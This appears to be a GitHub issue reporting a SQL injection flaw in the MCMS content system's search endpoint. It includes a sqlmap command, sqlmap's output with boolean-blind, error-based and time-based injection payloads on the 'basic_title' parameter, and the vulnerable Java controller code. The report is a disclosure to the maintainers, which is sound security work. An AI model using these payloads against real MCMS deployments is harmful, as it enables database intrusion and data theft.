You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
use sqlmap to test:
python sqlmap.py -u http://localhost:8080/ms-mcms/cms/1/search.do --data basic_title=q --level 3
the result is:
sqlmap identified the following injection point(s) with a total of 385 HTTP(s) requests:
Parameter: basic_title (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: basic_title=q') AND 3749=(SELECT (CASE WHEN (3749=3749) THEN 3749 ELSE (SELECT 7782 UNION SELECT 6107) END))-- ZskZ
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: basic_title=q') AND EXTRACTVALUE(9263,CONCAT(0x5c,0x716b627871,(SELECT (ELT(9263=9263,1))),0x71786b7a71)) AND ('nLqp'='nLqp
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (comment)
Payload: basic_title=q') OR SLEEP(5)#
Ask the author to fix this vulnerability.Thanks.
The text was updated successfully, but these errors were encountered:
Where SQL injection vulnerability code appears
@RequestMapping(value = "/{searchId}/search")
@responsebody
public void search(HttpServletRequest request, @PathVariable int searchId, HttpServletResponse response) {
SearchEntity _search = new SearchEntity();
_search.setAppId(BasicUtil.getAppId());
_search.setSearchId(searchId);
// 获取对应搜索模型
SearchEntity search = (SearchEntity) searchBiz.getEntity(_search);
//判断当前搜索是否有模板文件
if (ObjectUtil.isNull(search)) {
this.outJson(response, false);
}
Map<String, Object> map = new HashMap<>();
// 读取请求字段
Map<String, String[]> field = request.getParameterMap();
//TODO
Map<String, String> basicField = getMapByProperties(net.mingsoft.mdiy.constant.Const.BASIC_FIELD);
// 文章字段集合
Map<String, Object> articleFieldName = new HashMap<String, Object>();
// 自定义字段集合
Map<String, String> diyFieldName = new HashMap<String, String>();
Parameter 'basic_title' is not filtered and controllable
Payload
HTTP request URL address "http://localhost:8080/ms-mcms/cms/1/search.do"
use sqlmap to test:
python sqlmap.py -u http://localhost:8080/ms-mcms/cms/1/search.do --data basic_title=q --level 3
the result is:
sqlmap identified the following injection point(s) with a total of 385 HTTP(s) requests:
Parameter: basic_title (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: basic_title=q') AND 3749=(SELECT (CASE WHEN (3749=3749) THEN 3749 ELSE (SELECT 7782 UNION SELECT 6107) END))-- ZskZ
Ask the author to fix this vulnerability.Thanks.
The text was updated successfully, but these errors were encountered: